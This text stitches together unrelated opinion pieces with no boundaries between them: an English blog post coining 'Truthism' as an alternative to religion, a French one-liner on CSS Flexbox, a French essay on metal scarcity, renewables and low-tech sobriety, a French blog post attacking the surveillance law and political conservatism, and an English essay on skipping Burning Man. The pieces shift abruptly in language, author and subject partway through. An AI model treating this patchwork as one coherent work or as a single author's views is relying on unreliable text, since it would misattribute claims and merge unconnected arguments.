This discussion helps clarify my issues with traditional organized religion. There are plenty of good people, good ideas, good values, and good wisdom in the religious world, but to me that seems like something happening in spite of religion and not because of it. Using religion for growth requires an innovative take on things, since at a fundamental level, most religions seem to treat people like children instead of pushing them to grow. Many of today’s religions play to people’s fog with “believe in this or else…” fear-mongering and books that are often a rallying cry for ‘us vs. them’ divisiveness. They tell people to look to ancient scripture for answers instead of the depths of the mind, and their stubborn certainty when it comes to right and wrong often leaves them at the back of the pack when it comes to the evolution of social issues. Their certainty when it comes to history ends up actively pushing their followers away from truth—as evidenced by the 42% of Americans who have been deprived of knowing the truth about evolution. (An even worse staircase criminal is the loathsome world of American politics, with a culture that lives on Step 1 and where politicians appeal directly to people’s animals, deliberately avoiding anything on Steps 2-4.)
So What Am I?
Yes, I’m an atheist, but atheism isn’t a growth model any more than “I don’t like rollerblading” is a workout strategy.
So I’m making up a term for what I am—I’m a Truthist. In my framework, truth is what I’m always looking for, truth is what I worship, and learning to see truth more easily and more often is what leads to growth.
In Truthism, the goal is to grow wiser over time, and wisdom falls into your lap whenever you’re conscious enough to see the truth about people, situations, the world, or the universe. The fog is what stands in your way, making you unconscious, delusional, and small-minded, so the key day-to-day growth strategy is staying cognizant of the fog and training your mind to try to see the full truth in any situation.
Over time, you want your [Time on Step 2] / [Time on Step 1] ratio to go up a little bit each year, and you want to get better and better at inducing Step 3 Whoa moments and reminding yourself of the Step 4 purple blob. If you do those things, I think you’re evolving in the best possible way, and it will have profound effects on all aspects of your life.
That’s it. That’s Truthism.
Am I a good Truthist? I’m okay. Better than I used to be with a long way to go. But defining this framework will help—I’ll know where to put my focus, what to be wary of, and how to evaluate my progress, which will help me make sure I’m actually improving and lead to quicker growth.
To help keep me on mission, I made a Truthism logo:
logo
That’s my symbol, my mantra, my WWJD—it’s the thing I can look at when something good or bad happens, when a big decision is at hand, or on a normal day as a reminder to stay aware of the fog and keep my eye on the big picture.
And What Are You?
My challenge to you is to decide on a term for yourself that accurately sums up your growth framework.
If Christianity is your thing and it’s genuinely helping you grow, that word can be Christian. Maybe you already have your own clear, well-defined advancement strategy and you just need a name for it. Maybe Truthism hit home for you, resembles the way you already think, and you want to try being a Truthist with me.
Or maybe you have no idea what your growth framework is, or what you’re using isn’t working. If either A) you don’t feel like you’ve evolved in a meaningful way in the past couple years, or B) you aren’t able to corroborate your values and philosophies with actual reasoning that matters to you, then you need to find a new framework.
To do this, just ask yourself the same questions I asked myself: What’s the goal that you want to evolve towards (and why is that the goal), what does the path look like that gets you there, what’s in your way, and how do you overcome those obstacles? What are your practices on a day-to-day level, and what should your progress look like year-to-year? Most importantly, how do you stay strong and maintain the practice for years and years, not four days? After you’ve thought that through, name the framework and make a symbol or mantra. (Then share your strategy in the comments or email me about it, because articulating it helps clarify it in your head, and because it’s useful and interesting for others to hear about your framework.)
I hope I’ve convinced you how important this is. Don’t wait until your deathbed to figure out what life is all about.
Les Flexbox ont l'air vraiment puissantes pour résoudre la plupart des problèmes chiants du CSS :)
Nous connaissons maintenant les conséquences sur le climat de notre utilisation massive d’énergies fossiles. Pour les remplacer, le nucléaire, toutes générations confondues, n’est crédible ni industriellement, ni moralement. Indéniablement, nous pouvons et nous devons développer les énergies renouvelables. Mais ne nous imaginons pas qu’elles pourront remplacer les énergies fossiles et maintenir notre débauche énergétique actuelle.
Les problèmes auxquels nous faisons face ne pourront pas être résolus simplement par une série d’innovations technologiques et de déploiements industriels de solutions alternatives. Car nous allons nous heurter à un problème de ressources, essentiellement pour deux raisons : il faut des ressources métalliques pour capter les énergies renouvelables ; et celles-ci ne peuvent qu’être imparfaitement recyclées, ce phénomène s’aggravant avec l’utilisation de hautes technologies. La solution climatique ne peut donc passer que par la voie de la sobriété et de technologies adaptées, moins consommatrices.
Energies et ressources sont intimement liées
Les arguments sont connus : les énergies renouvelables ont un potentiel énorme ; et même si elles sont diffuses, pour partie intermittentes, et à date encore un peu trop chères, les progrès continus sur la production, le stockage, le transport, et leur déploiement massif devraient permettre de réduire les coûts et les rendre abordables.
Certes, la Terre reçoit chaque jour une quantité d’énergie solaire des milliers de fois plus grande que les besoins de l’humanité… Les scenarii sur des mondes « énergétiquement vertueux » ne manquent pas : troisième révolution industrielle du prospectiviste Jeremy Rifkin, plan Wind Water Sun du professeur Jacobson de l’université de Stanford, projet industriel Desertec, ou, à l’échelle française, simulations de l’association Negawatt ou de l’ADEME.
Tous sont basés sur des déploiements industriels très ambitieux. Wind Water Sun propose de couvrir les besoins en énergie de l’ensemble du monde, uniquement avec des renouvelables, d’ici 2030. Pour cela, il faudrait 3,8 millions d’éoliennes de 5 MW et 89 000 centrales solaires de 300 MW, soit installer en 15 ans 19 000 GW d’éoliennes (30 fois le rythme actuel de 40 GW au plus par an), et inaugurer quinze centrales solaires par jour.
Economie de guerre
Rien d’impossible sur le papier, mais il faudrait alors une véritable économie de guerre, pour organiser l’approvisionnement en matières premières – acier, ciment, résines polyuréthanes, cuivre, terres rares (pour fournir le néodyme des aimants permanents pour les génératrices de ces éoliennes, il faudrait – si tant est qu’il y ait les réserves disponibles – multiplier la production annuelle par 15 !) –, la production des équipements, la logistique et l’installation (bateaux, grues, bases de stockage…), la formation du personnel… Sans parler des dispositifs de transport et de stockage de l’électricité !
Mais l’irréalisme tient davantage aux ressources qu’aux contraintes industrielles ou financières. Car il faut des métaux pour capter, convertir et exploiter les énergies renouvelables. Moins concentrées et plus intermittentes, elles produisent moins de kWh par unité de métal (cuivre, acier) mobilisée que les sources fossiles. Certaines technologies utilisent des métaux plus rares, comme le néodyme dopé au dysprosium pour les éoliennes de forte puissance, l’indium, le sélénium ou le tellure pour une partie des panneaux photovoltaïques à haut rendement. Il faut aussi des métaux pour les équipements annexes, câbles, onduleurs ou batteries.
Nous disposons de beaucoup de ressources métalliques, de même qu’il reste énormément de gaz et pétrole conventionnels ou non, d’hydrates de méthane, de charbon… bien au-delà du supportable pour la régulation climatique planétaire, hélas.
Mais, comme pour le pétrole et le gaz, la qualité et l’accessibilité de ces ressources minières se dégradent (pour le pétrole et le gaz, le rapport entre quantité d’énergie récupérée et quantité d’énergie investie pour l’extraire est passé de 30-50 dans les champs onshore, à 5-7 dans les exploitations deep ou ultradeep offshore, et même 2-4 pour les sables bitumineux de l’Alberta). Car nous exploitons un stock de minerais qui ont été créés, enrichis par la nature « vivante » de la planète : tectonique des plaques, volcanisme, cycle de l’eau, activité biologique…
Deux problèmes au même moment
Logiquement, nous avons exploité d’abord les ressources les plus concentrées, les plus simples à extraire. Les nouvelles mines ont des teneurs en minerai plus basses que les mines épuisées (ainsi du cuivre, passé d’une moyenne de 1,8-2% dans les années 1930, à 0,5% dans les nouvelles mines), ou bien sont moins accessibles, plus dures à exploiter, plus profondes.
Exploitation de sables bitumineux au Canada (Jørgen Schyberg/flickr/CC)
Exploitation de sables bitumineux au Canada (Jørgen Schyberg/flickr/CC)
Or, que les mines soient plus profondes ou moins concentrées, il faut dépenser plus d’énergie, parce qu’il faut remuer toujours plus de « stériles » miniers, ou parce que la profondeur engendre des contraintes, de température notamment, qui rendent les opérations plus complexes.
Il y a donc une interaction très forte entre disponibilité en énergie et disponibilité en métaux, et la négliger serait se confronter à de grandes désillusions.
Si nous n’avions qu’un problème d’énergie (et de climat !), il « suffirait » de tartiner le monde de panneaux solaires, d’éoliennes et de smart grids (réseaux de transport « intelligents » permettant d’optimiser la consommation, et surtout d’équilibrer à tout moment la demande variable avec l’offre intermittente des énergies renouvelables).
Si nous n’avions qu’un problème de métaux, mais accès à une énergie concentrée et abondante, nous pourrions continuer à exploiter la croûte terrestre à des concentrations toujours plus faibles.
Mais nous faisons face à ces deux problèmes au même moment, et ils se renforcent mutuellement : plus d’énergie nécessaire pour extraire et raffiner les métaux, plus de métaux pour produire une énergie moins accessible.
L’économie circulaire est une gentille utopie
Les ressources métalliques, une fois extraites, ne disparaissent pas. L’économie circulaire, basée en particulier sur l’éco-conception et le recyclage, devrait donc être une réponse logique à la pénurie métallique. Mais celle-ci ne pourra fonctionner que très partiellement si l’on ne change pas radicalement notre façon de produire et de consommer.
Naturellement on peut et il faut recycler plus qu’aujourd’hui, et les taux de recyclage actuels sont souvent si bas que les marges de progression sont énormes. Mais on ne peut jamais atteindre 100% et recycler « à l’infini », quand bien même on récupérerait toute la ressource disponible et on la traiterait toujours dans les usines les plus modernes, avec les procédés les mieux maîtrisés (on en est très loin).
D’abord parce qu’il faut pouvoir récupérer physiquement la ressource pour la recycler, ce qui est impossible dans le cas des usages dispersifs ou dissipatifs. Les métaux sont couramment utilisés comme produits chimiques, additifs, dans les verres, les plastiques, les encres, les peintures, les cosmétiques, les fongicides, les lubrifiants et bien d’autres produits industriels ou de la vie courante (environ 5% du zinc, 10 à 15% du manganèse, du plomb et de l’étain, 15 à 20% du cobalt et du cadmium, et, cas extrême, 95% du titane dont le dioxyde sert de colorant blanc universel).
Ensuite parce qu’il est difficile de recycler correctement. Nous concevons des produits d’une diversité et d’une complexité inouïes, à base de composites, d’alliages, de composants de plus en plus miniaturisés et intégrés… mais notre capacité, technologique ou économique, à repérer les différents métaux ou à les séparer, est limitée.
Les métaux non ferreux contenues dans les aciers alliés issus de première fonte sont ferraillés de manière indifférenciée et finissent dans des usages moins nobles comme les ronds à béton du bâtiment. Ils ont bien été recyclés, mais sont perdus fonctionnellement, les générations futures n’y auront plus accès, ils sont « dilués ». Il y a dégradation de l’usage de la matière : le métal « noble » finit dans un acier bas de gamme, comme la bouteille plastique finit en chaise de jardin.
La vraie voiture propre, c’est le vélo !
La voiture propre est ainsi une expression absurde, quand bien même les voitures fonctionneraient avec une énergie « 100% propre » ou « zéro émission ». Sans remise en question profonde de la conception, il y aura toujours des usages dispersifs (divers métaux dans la peinture, étain dans le PVC, zinc et cobalt dans les pneus, platine rejeté par le pot catalytique…), une carrosserie, des éléments métalliques et de l’électronique de bord qui seront mal recyclés… La vraie voiture propre, ou presque, c’est le vélo !
Perte entropique ou par dispersion (à la source ou à l’usage), perte « mécanique » (par abandon dans la nature, mise en décharge ou incinération), perte fonctionnelle (par recyclage inefficace) : le recyclage n’est pas un cercle mais un boyau percé, et à chaque cycle de production-usage-consommation, on perd de manière définitive une partie des ressources. On peut toujours progresser. Mais sans revoir drastiquement notre manière d’agir, les taux resteront désespérément bas pour de nombreux petits métaux high tech et autres terres rares (pour la plupart, moins de 1% aujourd’hui), tandis que pour les grands métaux nous plafonnerons à un taux typique de 50 à 80% qui restera très insuffisant.
Canettes d'aluminium compactées avant recyclage (SB/Rue89 Bordeaux)
Canettes d’aluminium compactées avant recyclage (SB/Rue89 Bordeaux)
La croissance « verte » sera mortifère
La croissance « verte » se base, en tout cas dans son acception actuelle, sur le tout-technologique. Elle ne fera alors qu’aggraver les phénomènes que nous venons de décrire, qu’emballer le système, car ces innovations « vertes » sont en général basées sur des métaux moins répandus, aggravent la complexité des produits, font appel à des composants high tech plus durs à recycler. Ainsi du dernier cri des énergies renouvelables, des bâtiments « intelligents », des voitures électriques, hybrides ou hydrogène…
Le déploiement suffisamment massif d’énergies renouvelables décentralisées, d’un internet de l’énergie, est irréaliste. Si la métaphore fleure bon l’économie « dématérialisée », c’est oublier un peu vite qu’on ne transporte pas les électrons comme les photons, et qu’on ne stocke pas l’énergie aussi aisément que des octets. Pour produire, stocker, transporter l’électricité, même « verte », il faut quantité de métaux. Et il n’y a pas de loi de Moore (postulant le doublement de la densité des transistors tous les deux ans environ) dans le monde physique de l’énergie.
Mais une lutte technologique contre le changement climatique sera aussi désespérée.
Ainsi dans les voitures, où le besoin de maintenir le confort, la performance et la sécurité nécessite des aciers alliés toujours plus précis pour gagner un peu de poids et réduire les émissions de CO2. Alors qu’il faudrait limiter la vitesse et brider la puissance des moteurs, pour pouvoir dans la foulée réduire le poids et gagner en consommation. La voiture à un litre aux cent kilomètres est à portée de main ! Il suffit qu’elle fasse 300 ou 400 kg, et ne dépasse pas les 80 km/h.
Ainsi dans les bâtiments, où le niveau de confort toujours plus exigeant nécessite l’emploi de matériaux rares (verres faiblement émissifs) et une électronicisation généralisée pour optimiser la consommation (gestion technique du bâtiment, capteurs, moteurs et automatismes, ventilation mécanique contrôlée).
Avec la croissance « verte », nous aimerions appuyer timidement sur le frein tout en restant pied au plancher : plus que jamais, notre économie favorise le jetable, l’obsolescence, l’accélération, le remplacement des métiers de service par des machines bourrées d’électronique, en attendant les drones et les robots. Ce qui nous attend à court terme, c’est une accélération dévastatrice et mortifère, de la ponction de ressources, de la consommation électrique, de la production de déchets ingérables, avec le déploiement généralisé des nanotechnologies, des big data, des objets connectés. Le saccage de la planète ne fait que commencer.
La solution climatique passera par les « low tech »
Il nous faut prendre la vraie mesure de la transition nécessaire et admettre qu’il n’y aura pas de sortie par le haut à base d’innovation technologique – ou qu’elle est en tout cas si improbable, qu’il serait périlleux de tout miser dessus. On ne peut se contenter des business models émergents, à base d’économie de partage ou de la fonctionnalité, peut-être formidables mais ni généralisables, ni suffisants.
Nous devrons décroître, en valeur absolue, la quantité d’énergie et de matières consommées. Il faut travailler sur la baisse de la demande, non sur le remplacement de l’offre, tout en conservant un niveau de « confort » acceptable.
C’est toute l’idée des low tech, les « basses technologies », par opposition aux high tech qui nous envoient dans le mur, puisqu’elles sont plus consommatrices de ressources rares et nous éloignent des possibilités d’un recyclage efficace et d’une économie circulaire. Promouvoir les low tech est avant tout une démarche, ni obscurantiste, ni forcément opposée à l’innovation ou au « progrès », mais orientée vers l’économie de ressources, et qui consiste à se poser trois questions.
Pourquoi produit-on ? Il s’agit d’abord de questionner intelligemment nos besoins, de réduire à la source, autant que possible, le prélèvement de ressources et la pollution engendrée. C’est un exercice délicat car les besoins humains – nourris par la rivalité mimétique – étant a priori extensibles à l’infini, il est impossible de décréter « scientifiquement » la frontière entre besoins fondamentaux et « superflus », qui fait aussi le sel de la vie. D’autant plus délicat qu’il serait préférable de mener cet exercice démocratiquement, tant qu’à faire.
Il y a toute une gamme d’actions imaginables, plus ou moins compliquées, plus ou moins acceptables.
Certaines devraient logiquement faire consensus ou presque, à condition de bien exposer les arguments (suppression de certains objets jetables, des supports publicitaires, de l’eau en bouteille…).
D’autres seront un peu plus difficiles à faire passer, mais franchement nous n’y perdrions quasiment pas de « confort » (retour de la consigne, réutilisation des objets, compostage des déchets, limite de vitesse des véhicules…).
D’autres enfin promettent quelques débats houleux (réduction drastique de la voiture au profit du vélo, adaptation des températures dans les bâtiments, urbanisme revisité pour inverser la tendance à l’hypermobilité…).
Qui est liberticide ?
Liberticide ? Certainement, mais nos sociétés sont déjà liberticides. Il existe bien une limite, de puissance, de poids, fixée par la puissance publique, pour l’immatriculation des véhicules. Pourquoi ne pourrait-elle pas évoluer ? Un des principes fondamentaux en société est qu’il est préférable que la liberté des uns s’arrête là où commence celle des autres. Puisque nous n’avons qu’une planète et que notre consommation dispendieuse met en danger les conditions même de la vie humaine – et de bien d’autres espèces – sur Terre, qui est liberticide ? Le conducteur de 4×4, l’utilisateur de jet privé, le propriétaire de yacht, ou celui qui propose d’interdire ces engins de mort différée ?
Que produit-on ? Il faut ensuite augmenter considérablement la durée de vie des produits, bannir la plupart des produits jetables ou dispersifs, s’ils ne sont pas entièrement à base de ressources renouvelables et non polluantes, repenser en profondeur la conception des objets : réparables, réutilisables, faciles à identifier et démanteler , recyclables en fin de vie sans perte, utilisant le moins possible les ressources rares et irremplaçables, contenant le moins d’électronique possible, quitte à revoir notre « cahier des charges », accepter le vieillissement ou la réutilisation de l’existant, une esthétique moindre pour les objets fonctionnels, parfois une moindre performance ou une perte de rendement… en gros, le moulin à café et la cafetière italienne de grand-mère, plutôt que la machine à expresso dernier cri. Dans le domaine énergétique, cela pourrait prendre la forme de la micro et mini hydraulique, de petites éoliennes « de village » intermittentes, de solaire thermique pour les besoins sanitaires et la cuisson, de pompes à chaleur, de biomasse…
Comment produit-on ? Il y a enfin une réflexion à mener sur nos modes de production. Doit-on poursuivre la course à la productivité et à l’effet d’échelle dans des giga-usines, ou faut-il mieux des ateliers et des entreprises à taille humaine ? Ne doit-on pas revoir la place de l’humain, le degré de mécanisation et de robotisation, la manière dont nous arbitrons aujourd’hui entre main-d’œuvre et ressources / énergie ? Notre rapport au travail (meilleur partage entre tous, intérêt d’une spécialisation outrancière, répartition du temps entre travail salarié et activités domestiques, etc.) ?
Et puis il y a la question aigüe de la territorialisation de la production. Après des décennies de mondialisation facilitée par un coût du pétrole suffisamment bas et le transport par conteneurs, le système est devenu absurde.
À l’heure des futures perturbations, des tensions sociales ou internationales, des risques géopolitiques à venir, que le changement climatique ou les pénuries de ressources risquent d’engendrer, sans parler des scandales sanitaires possibles, un système basé sur une Chine « usine du monde » est-il vraiment résilient ?
Un projet de société
Pour réussir une telle évolution, indispensable mais tellement à contre-courant, il faudra résoudre de nombreuses questions, à commencer par celle de l’emploi. « La croissance, c’est l’emploi » a tellement été martelé qu’il est difficile de parler de sobriété sans faire peur.
Malgré l’évidence des urgences environnementales, toute radicalité écologique, toute évolution réglementaire ou fiscale d’envergure, même progressive, toute réflexion de fond même, est interdite par la terreur – légitime – de détruire des emplois. Une fois acté le fait que la croissance ne reviendra pas (on y vient doucement), et tant mieux compte tenu de ses effets environnementaux, il faudra se convaincre que le plein-emploi, ou la pleine activité, est parfaitement atteignable dans un monde post-croissance économe en ressources.
Il faudra aussi se poser la question de l’échelle territoriale à laquelle mener cette transition, entre une gouvernance mondiale, impossible dans les délais impartis, et des expériences locales individuelles et collectives, formidables mais insuffisantes. Même enchâssé dans le système d’échanges mondial, un pays ou un petit groupe de pays pourrait prendre les devants, et, protégé par des mesures douanières bien réfléchies, amorcer un réel mouvement, porteur d’espoir et de radicalité.
Compte-tenu des forces en présence, il y a bien sûr une part utopique dans un tel projet de société. Mais n’oublions pas que le scénario de statu quo est probablement encore plus irréaliste, avec des promesses de bonheur technologique qui ne seront pas tenues et un monde qui s’enfoncera dans une crise sans fin, sans parler des risques de soubresauts politiques liés aux frustrations toujours plus grandes. Pourquoi ne pas tenter une autre route ? Nous avons largement les moyens, techniques, organisationnels, financiers, sociétaux et culturels pour mener une telle transition. A condition de le vouloir.
Ce n'est pas un scoop: j'ai participé, à ma mesure, à la lutte contre la loi scélérate sur le renseignement. Ce n'est pas une surprise: j'ai été plus que déçu par la décision rendue par le Conseil Constitutionnel à son sujet. Mais ce n'est pas l'objet du présent billet. Avec le recul, il semble évident que nous (les opposants à cette loi) n'avons pas su nous faire comprendre du grand public. Le texte était complexe, ses enjeux très techniques ou très philosophiques, et nous avons choisi de les expliquer: c'était sans doute une erreur.
Pendant que les tenants du texte préféraient jouer sur le registre émotionnel ("Si vous ne votez pas ce texte, vous serez responsables du prochain attentat") ou démagogique ("si vous êtes contre nous, vous êtes avec les terroristes"), nous nous sommes fatigués à décortiquer le danger des "boites noires" et des algorithmes informatiques, à en appeler à Foucault et au panoptique, et à rappeler l'importance de la vie privée pour la liberté de penser.
Sur ces bases, le combat de l'adhésion populaire était perdu d'avance: face au populisme, le pari de l'intellligence est souvent perdant.
Une unanimité jamais vue
Pour autant, un point reste remarquable: jamais, en 20 ans de lutte pour les libertés je n'avais vu pareille unanimité de la mal nommée "société civile" contre un texte. Jamais. Du SNJ au Syndicat de la Magistrature, de l'ONU au Conseil de l'Europe, de la Quadrature du Net à la LDH, en passant par le juge Trevidic et le Défenseur des Droits Jacques Toubon: tous se sont opposés, avec peu ou prou les mêmes réserves, à ce texte. Il serait d'ailleurs bien plus court de faire la liste des organismes ou associations qui l'ont défendu: il n'y en a pas.
Et de cette levée de boucliers qui fut (et c'est aussi une nouveauté) bien reprise dans les médias, le gouvernement n'a rien vu, rien entendu. Devant les deux assemblées, elle a été ignorée d'un revers de main, quand elle n'a pas été dénigrée ou caricaturée.
On nous a tour à tour accusé d'avoir fait peser une "odieuse pression" sur les députés (car il est bien connu qu'il est honteux pour des citoyens d'essayer d'influencer le vote de leurs représentants), d'être des "exégètes amateurs" qui ne comprenaient rien au "juridisme" de la loi, ou encore de n'être que des "numéristes" (comme si comprendre les enjeux des nouvelles technologies ne pouvait que disqualifier ceux qui s'y essaient).
Quant aux rares parlementaires qui ont essayé de relayer ces inquiétudes, ils ont été raillés, dénigrés, ridiculisés par des ministres "droits dans leurs bottes" et totalement sourds aux arguments qui étaient développés. Aucun amendement, aucune remise en cause du texte présenté n'ont été admis. Et toujours au nom de la sacro-sainte lutte contre le terrorisme (qui n'était pourtant, faut-il encore le rappeler, pas l'enjeu principal de la loi).
Pour suivre les débats parlementaires de façon plus ou moins régulière, je n'avais jamais vu ça. Jamais vu autant de rejet de la part de tout ce que la société compte d'entités concernées face à autant d'immobilisme de la part du gouvernement. Quand on voit en parallèle la manière dont le même gouvernement a reculé sans la moindre hésitation face à la fronde des bonnets rouges, de la FNSEA ou d'autres lobbies moins connus à l'occasion des votes de textes qui, eux, ne touchaient pas aux libertés fondamentales, quand on voit avec quelle haine les ministres et la grande majorité des élus parlaient d'Internet pendant les débats, au point d'en faire une insulte, il me semble que c'est très symptomatique.
Odeur de rance.
Mais symptomatique de quoi ?
J'ai voulu, avant de réagir à tout ça, prendre du recul. Un recul qui, peut-être, m'a permis de relier ce symptôme à d'autres, sans rapport avec la loi renseignement, mais qui tous me semblent relever du même mal: un néoconservatisme galopant, une pensée réactionnaire à ce point "décomplexée" qu'elle a largement dépassé son habitat de droite naturel et largement infusé, y compris au sein des grands partis dits "de gauche".
Quand Jean-Jacques Urvoas se réjouit (https://twitter.com/JJUrvoas/status/624324424393592832), sur Twitter, de la décision du Conseil Constitutionnel sur (sic) 'la loi "rens."', le lapsus est révélateur. Quoi de plus rance, en effet, que cette volonté réaffirmée d'un contrôle social, d'une surveillance de masse à même d'imposer un ordre moral venu d'en haut, autrefois garanti par l'église, et dont toute une partie, elle aussi bien rance, de la société souhaite le retour ?
Ce que je vois, bien au delà de cette loi et de la manière dont elle a été votée, c'est une rupture. Une fracture qui est loin de n'être que "numérique".
La fracture temporelle.
Quand une grande part de la société est à la recherche de nouveaux modes de consommation, plus respectueux de l'environnement, plus éthiques aussi, qu'elle développe la culture du partage (des ressources, de la musique, du savoir...) alors que l'état abandonne l'écotaxe, soutient l'agriculture intensive au détriment des petites exploitations (http://www.politis.fr/Un-gouvernement-a-la-botte-de-la,32260.html), et lutte contre toutes les innovations qui risqueraient de mettre à mal des rentes qui remontent au siècle passé (taxe copie privée étendue au "cloud", redevance audiovisuelle étendue aux "box", loi Thevenoud imposant 15mn d'attente aux VTC, et tant d'autres...).
Quand une autre partie de la société - la plus démunie - cesse de réfléchir au futur faute de pouvoir s'y projeter et n'a d'autre espoir qu'un retour à un passé qu'elle croit meilleur, encouragée par tout ce que la classe politique compte de démagogues et de populistes, et entraînant avec elle quelques vieux autoproclamés intellectuels, dépassés par le monde moderne et qui n'ont pas de mots assez durs pour fustiger ce qu'ils n'ont pas les moyens de comprendre.
Tout se passe comme si nous avions d'une part une population tournée vers l'avenir, imaginant une démocratie modernisée, une économie collaborative, sociale et solidaire, s'adaptant aux nouveautés numériques (telle la petite poucette de Michel Serres) mais tout aussi capable d'imaginer un débat public sur le revenu universel, la dépénalisation des drogues douces ou l'accueil des réfugiés, et d'autre part une classe politique résolument tournée vers un passé archaïque, rêvant d'uniformes scolaires, de morale à l'école, d'interdiction du mariage pour tous, et d'un paternalisme assis sur le cumul des mandats, le copinage et la corruption.
Quand certains souhaitent la censure de la pornographie en ligne, ou le retour du "saint du jour" et de quoi remplacer l'église dans son rôle de maître-à-penser, d'autres pensent startup, démocratie liquide, liberté d'expression, post-capitalisme et protection de la vie privée.
Et, hélas, cette "fracture temporelle" emporte avec elle tout ce que la société compte d'exclus, de laissés pour compte et de vieilles haines rancies contre l'autre, quel qu'il soit, en les poussant à croire au bon vieux bouc émissaire (hier juif, aujourd'hui musulman) responsable de tous ses maux, à espérer qu'un retour à d'anciennes "valeurs" leur redonnera un pouvoir (qu'ils n'ont jamais eu) sur leur propre avenir, et à voter pour celui qui saura le mieux prendre la posture maréchalesque du sauveur suprême.
C'est je crois le sens qu'il faut donner à cette volonté manifeste de nos gouvernants, qu'ils soient d'un bord ou de l'autre, de "civiliser" (lire "contrôler, surveiller et censurer") Internet, en tant que symbole de toutes leurs peurs, de toute leur ignorance et de tous les espoirs d'une innovation sociale qu'ils rejettent aveuglément.
On pourrait appeler ça la querelle des anciens et des modernes 2.0, si ça n'était hélas un symptôme supplémentaire du pourrissement de la Vème république et notre démocratie.
Ne nous y trompons pas: "l'invasion des barbares", chère à Nicolas Colin, est en marche et ce ne sont pas les postures passéistes qui protégeront une société qui semble préférer le repli sur soi à l'ouverture aux autres. Sans une transformation radicale du discours politique, si nous ne savons pas mettre l'imagination au pouvoir plutôt qu'une nostalgie d'un passé qui n'a jamais existé, ce n'est pas seulement nos lois qui seront rances.
Ce sera notre société tout entière.
I have gone to Burning Man 15 years in a row. When I went the first time, back in 2000, I was a journalist on assignment for Rolling Stone. That was an amazing introduction to the event, as I was able to go “back stage” and meet the organizers, artists, and geniuses behind the sculptures, lasers, and camps. I was immediately hooked. I couldn’t believe such a place existed – that tens of thousands of people shared the same ideals, and worked together to realize their visions.
I wrote this piece about my experiences. I also wrote a feature about the festival for ArtForum. By proposing that Burning Man had validity as an artistic expression – I discussed Joseph Beuys’ idea of “social sculpture” – I got banned from ArtForum after they published my piece. I also wrote about the festival, personally and philosophically, in Breaking Open the Head, my first book, and 2012: The Return of Quetzalcoatl, my second. Burning Man has had a profound experience on my life, in many ways.
This year, I am skipping it. There are a few reasons for this, but the main one is that I feel Burning Man – an institution in its own process of ongoing change and evolution – has lost its way. Hopefully, this is temporary. I know and love many of the people who create and run the festival, and believe in their intentions and their vision.
Burning Man has accomplished amazing things, opening up whole new realms of individual freedom and culture expression. At the same time the festival has become a bit of a victim of its own success. It has become a massive entertainment complex, a bit like Disney World for a contingent made up mostly of the wealthy elite. It always had this vibe, to some extent, but it seems more pronounced in recent years. It feels like there is more and more of less and less. The potential for some kind of authentic liberation or awakening seems increasingly obscure and remote.
The change in Burning Man – admittedly it is subtle – is happening as our world slides toward ecological catastrophe. The ecological crisis has become my almost monomaniacal focus recently. From my perspective, it is crucial that people awaken to what is happening to our Earth. We need to quickly understand and then start making the changes necessary to ensure the continuity of our ecosystems. Part of my enthusiasm for Burning Man was that it seemed a place where a new human community could arise – a new way of being. This potential is still there – but it seems like it has been co-opted, distorted.
At Burning Man, there was always a tension between two world views, which I would characterize as libertarian hedonism and mystical anarchism. I feel, as a result of its rapid growth and, also, as the festival has become a magnet for the wealthy elite (the Silicon Valley crowd, the media moguls and their entourages, the Ibiza crowd, etc), it has tilted too far toward libertarian hedonism. Art cars have become the new yachts, representing expressions of massively inflated egos. Wealthy camps will drop hundreds of thousands on a vehicle, then parade it around, with a velvet rope vibe. Increasingly, the culture of Burning Man feels like an offshoot of the same mindless, self-interested, nihilistic worldview and neoliberal economics that are rapidly annihilating our shared life-world.
I remember, a few years back, I stayed near a camp that had been built for the founder of Cirq du Soleil, Guy de Liberte, and his friends. The camp was empty throughout the week. There were many beautiful gypsy caravan-style tents set up, awaiting the weekend visitors from Europe and Ibiza. There were also a few Mexican workers who labored over the course of the week, building shade structures and decorating the art cars. Nobody had offered these workers a place to stay in one of the carefully shaded luxury tents, so they had pitched their small nylon tent directly in the hot sun. That image seems to sum up where Burning Man has drifted, inexorably.
We lack a moral center in our society, and we are rapidly caroming toward the abyss. It is absolutely extraordinary – in itself, miraculous – that the new Pope, Pope Francis, has shown up as one of the only people in our entire planetary culture able to speak directly to the needs of our moment – he calls for an “ecological conversion,” for shared sacrifice on the part of the wealthy elite, a new mode of empathic and compassionate action for us all. In the Encyclical, Care for Our Common Home, Francis writes:
All-powerful God, you are present in the whole universe
and in the smallest of your creatures.
You embrace with your tenderness all that exists.
Pour out upon us the power of your love,
that we may protect life and beauty.
Fill us with peace, that we may live as brothers and sisters, harming no one.
O God of the poor,
help us to rescue the abandoned and forgotten of this earth,
so precious in your eyes.
Bring healing to our lives, that we may protect the world and not prey on it,
that we may sow beauty, not pollution and destruction.
Is it possible that Pope Francis could rehabilitate the Catholic tradition, which seemed utterly hopeless, corrupt and antiquated, and turn it into a progressive force for good? We are going to need a number of miraculous conversions and transformations such as this one, if we are going to survive as a species, and learn to flourish together with nature, in the short time before it is too late to do anything but undergo a universal, horrific meltdown – a Chod ritual, on a planetary scale.
As I wrote in my books, I believe Burning Man represents an organic expression of something innate to human being-ness: We need initiatory experiences – centers where non-ordinary states of consciousness can be explored and, also, interpreted, with a shared context for understanding and integration. Emerging from the psychedelic culture of the Bay Area, Burning Man is, to a certain extent, a postmodern reinvention of centers of Mystery School wisdom, like Eleusis, which the artists, philosophers, and leaders of the Classical World visited each year. However, at this point, it lacks a deeper awareness of its own value and purpose. Without this, it is in danger of becoming another appendage of the military-industrial-entertainment complex – another distraction factory.
I find that many people I know are living on the razor-edge of nihilism right now, skating the edge of the Void. In my own life, I have lived through the eruption and the projection of my own shadow material – and I see many people undergoing their own versions of this, in different areas of their lives. I can’t help but see this as a perfectly appropriate and even necessary part of a process that could lead to our apotheosis as a species (the birth of the Ubermench, who according to Nietzsche, represents the fusion of “the mind of Caesar” with “the soul of Christ”) or our collective dissolution. It is exciting that this process seems to be happening within our current lifespans.
